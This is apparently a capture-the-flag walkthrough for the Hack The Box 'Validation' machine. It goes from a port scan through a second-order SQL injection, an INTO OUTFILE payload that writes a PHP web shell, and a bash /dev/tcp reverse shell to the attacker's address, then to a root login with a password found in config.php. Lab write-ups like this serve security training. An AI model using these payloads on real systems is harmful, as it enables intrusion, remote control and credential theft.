In this tutorial we will get root access for the Validation machine from Hack The Box.
TLDR
- 1. Run port scan
- 2. Find web app on port 80
- 3. Find 2nd order SQLi in the
countryparam. - 4. Upload a web shell as DB user has FILE permission.
- 5. Create a reverse shell.
- 6. Find root password in the
/var/www/html/config.phpfile.
Walkthrough
At first we run the port scan nmap -p1-65535 -v 10.10.11.116:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 |
vladimir@comp:~$ nmap -p1-65535 -v 10.10.11.116 Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-23 13:25 MSK Initiating Ping Scan at 13:25 Scanning 10.10.11.116 [2 ports] Completed Ping Scan at 13:25, 0.11s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 13:25 Completed Parallel DNS resolution of 1 host. at 13:25, 0.00s elapsed Initiating Connect Scan at 13:25 Scanning 10.10.11.116 [65535 ports] Discovered open port 8080/tcp on 10.10.11.116 Discovered open port 22/tcp on 10.10.11.116 Discovered open port 80/tcp on 10.10.11.116 Connect Scan Timing: About 3.13% done; ETC: 13:41 (0:15:59 remaining) Connect Scan Timing: About 5.91% done; ETC: 13:43 (0:16:59 remaining) Connect Scan Timing: About 9.01% done; ETC: 13:42 (0:15:49 remaining) Increasing send delay for 10.10.11.116 from 0 to 5 due to max_successful_tryno increase to 4 Discovered open port 4566/tcp on 10.10.11.116 Connect Scan Timing: About 21.65% done; ETC: 13:44 (0:14:54 remaining) Increasing send delay for 10.10.11.116 from 5 to 10 due to max_successful_tryno increase to 5 Connect Scan Timing: About 29.28% done; ETC: 13:44 (0:13:56 remaining) Connect Scan Timing: About 35.47% done; ETC: 13:45 (0:12:57 remaining) Connect Scan Timing: About 40.78% done; ETC: 13:45 (0:11:52 remaining) Connect Scan Timing: About 46.50% done; ETC: 13:45 (0:10:50 remaining) Increasing send delay for 10.10.11.116 from 10 to 20 due to max_successful_tryno increase to 6 Increasing send delay for 10.10.11.116 from 20 to 40 due to max_successful_tryno increase to 7 Connect Scan Timing: About 61.03% done; ETC: 13:50 (0:09:49 remaining) Connect Scan Timing: About 69.58% done; ETC: 13:53 (0:08:33 remaining) Connect Scan Timing: About 76.05% done; ETC: 13:55 (0:07:08 remaining) Connect Scan Timing: About 81.94% done; ETC: 13:56 (0:05:37 remaining) Connect Scan Timing: About 87.45% done; ETC: 13:57 (0:04:03 remaining) Connect Scan Timing: About 92.68% done; ETC: 13:58 (0:02:26 remaining) Connect Scan Timing: About 97.74% done; ETC: 13:59 (0:00:46 remaining) Completed Connect Scan at 13:59, 2083.66s elapsed (65535 total ports) Nmap scan report for 10.10.11.116 Host is up (0.11s latency). Not shown: 65522 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 4566/tcp open kwtc 5000/tcp filtered upnp 5001/tcp filtered commplex-link 5002/tcp filtered rfe 5003/tcp filtered filemaker 5004/tcp filtered avt-profile-1 5005/tcp filtered avt-profile-2 5006/tcp filtered wsm-server 5007/tcp filtered wsm-server-ssl 5008/tcp filtered synapsis-edge 8080/tcp open http-proxy Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 2083.80 seconds |
If we open http://10.10.11.116:80 we will see a registration page:
When you register a new user you are redirected to the account.php page with a list of all users. When you intercept the request there are 2 params being sent: username and country:
Country parameter is prone to 2nd order SQLi. If you pass country’ in the account.php page you will see an error:
It means that the malicious country parameter is saved into DB and later used in other SQL query.
Now we can upload a webshell using SQLi as our user has FILE permission in the DB. Use the following SQL statement to create a web shell: username=test3&country=Aruba' UNION SELECT "<?php SYSTEM($_REQUEST['cmd']) ?>" INTO OUTFILE "/var/www/html/myshell.php"-- -:
Now if you open http://10.10.11.116/myshell.php?cmd=id you should see:
|
1 |
test1 uid=33(www-data) gid=33(www-data) groups=33(www-data) |
Now we should establish a reverse shell. Start nc listener on your local machine:
|
1 2 |
vladimir@comp:~$ nc -nlvp 9090 Listening on [0.0.0.0] (family 0, port 9090) |
Establish a reverse session using web shell: http://10.10.11.116/myshell.php?cmd=bash+-c+%27bash+-i+%3E%26+/dev/tcp/10.10.14.60/9090+0%3E%261%27
You should get a back connection:
|
1 2 3 4 5 6 |
vladimir@comp:~$ nc -nlvp 9090 Listening on [0.0.0.0] (family 0, port 9090) Connection from 10.10.11.116 44456 received! bash: cannot set terminal process group (1): Inappropriate ioctl for device bash: no job control in this shell www-data@validation:/var/www/html$ |
In the /var/www/html you can find a config.php file with password. This password can also be used for root user:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
www-data@validation:/var/www/html$ cat config.php cat config.php <?php $servername = "127.0.0.1"; $username = "uhc"; $password = "uhc-9qual-global-pw"; $dbname = "registration"; $conn = new mysqli($servername, $username, $password, $dbname); ?> www-data@validation:/var/www/html$ su --login root su --login root Password: uhc-9qual-global-pw id uid=0(root) gid=0(root) groups=0(root) |